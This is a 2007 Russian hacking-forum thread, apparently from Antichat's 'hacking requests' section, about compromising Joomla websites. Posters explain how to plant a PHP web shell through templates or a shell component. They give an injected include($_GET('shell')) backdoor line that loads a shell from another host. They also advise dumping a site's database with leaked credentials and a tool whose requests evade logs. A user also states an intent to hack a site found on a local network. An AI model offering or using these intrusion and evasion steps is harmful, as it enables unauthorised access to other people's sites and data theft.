Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Просьбы о взломах (https://forum.antichat.xyz/forumdisplay.php?f=44)
-   -   Кто ломал Joomla (https://forum.antichat.xyz/showthread.php?t=31897)

z37 23.01.2007 05:23

Кто ломал Joomla
 
Как залить шелл в joomla!? :confused:Есть доступ в админ панель

hsi 23.01.2007 06:41

Попробуй через шаблоны.
Тогда шелл будет лежать в директории site.com/templates.

win32_reverse 24.01.2007 04:59

xaxaxa
 
Ребята, подскажите ещё варианты взлома этого двига. очень надо)) Может что-то через метасплоит выйдет? :) надеюсь на помощь

win32_reverse 24.01.2007 05:19

блин, в локалке появился сайт на этом движке... слюньки текут... только ниразу с движком не работал. подскажите по существу что-то. плз. буду благодарен))

ice1k 24.01.2007 06:53

Цитата:

Сообщение от win32_reverse
блин, в локалке появился сайт на этом движке... слюньки текут... только ниразу с движком не работал. подскажите по существу что-то. плз. буду благодарен))

Если тебе нужно что-то, то смотри это "что-то" здесь:
http://www.securitylab.ru/search/index.php?q=Joomla&where=iblock_vulnerability
=\

lunt 01.06.2007 09:07

есть копонент php shell для джомала где то 57 кб. в админке выбираешь установить компонент и указываешь на предварительно скачанный компонент php шел
я делал так, можно еще через компонент joomla explorer - открываешь любой php файл у которого стоят права на выполнение шела и добавляешь в конец иили в начало строку include($_GET('shell')); после пишешь полный путь к этой страничке м через cmd гет параметр подгружаешь шел с другого хоста, или можешь папку на чтение записиь нацйти и просто тудда шел загрузить, но жто опаснее - так как его можна найти очень легко

K0T 27.07.2007 10:36

А есть дыры для Joomla! 1.0.12 Lavra Edition 2007? и есть Какие? пример желательно

kuga 30.08.2007 14:00

Всем здоровья!
Подскажите, пожалуйста!

Сайт на Joomla!
В файле configuration.php есть строки:

$mosConfig_db = 'site';
$mosConfig_user = 'site';
$mosConfig_password = '4168227'; Изменен.

Это как я понял акк к БД. Вопрос - как её сдампить?

Пробывал через r57 - подключается к БД, но почему-то не дампит.
Спасибо.

IIAHbI4 30.08.2007 14:51

мускульные ГУИ и вперёд. [Navicat MySQL в полне подойдёт]

TANZWUT 30.08.2007 14:51

http://shankar.name/sql.phps вот этим, пост запросы в логах не палятся ;)


Время: 10:24